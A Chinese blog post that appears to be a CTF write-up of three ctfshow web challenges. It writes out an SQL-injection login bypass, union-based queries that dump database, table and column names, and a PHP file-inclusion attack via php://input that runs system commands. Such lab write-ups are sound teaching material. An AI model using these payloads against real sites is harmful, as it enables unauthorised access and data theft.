刷web记录之ctfshow

记录ctfshow web 练习题

web签到题1

打开之后有一段话“where is flag? ”其他什么也没有,查看一下网络源代码发现里面有一段注释掉的beas64
在这里插入图片描述
将其进行解码就能得到flag
在这里插入图片描述

web2

打开之后是一个非常简陋的登录框根据题目所说这应该是一道sql注入题
在这里插入图片描述首先进行简单的测试:

万能登录:admin' or 1=1#
密码:随意,只要有即可

在这里插入图片描述
在这里插入图片描述
登录之后,就可以开始尝试注入了,这道题可以看出来显示位是3,因此直接进行sql注入

admin' union select 1,database(),3#

在这里插入图片描述
得到其数据库为web2

admin'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#

在这里插入图片描述可以得到其表名:flag,user

admin'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'#

在这里插入图片描述得到其字段名为flag

admin'union select 1,flag,3 from flag#

在这里插入图片描述即可得到flag,这题很简单,是很基础的sql注入

web3

打开之后是一个很简洁的页面,提示有incldde构成的文件包含的漏洞,查看网页源代码并没有发现什么价值的东西。因为有文件包含漏洞,我们可以尝试使用伪协议:php://input给其构成命令执行漏洞

php://input

在这里插入图片描述然后对所构造的页面进行抓包

在这里插入图片描述然后在构造命令:

<?php system("ls");?>

在这里插入图片描述然后在构造命令查看ctf_go_go_go文件:

<?php system("cat ctf_go_go_go");?>

得到结果:
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值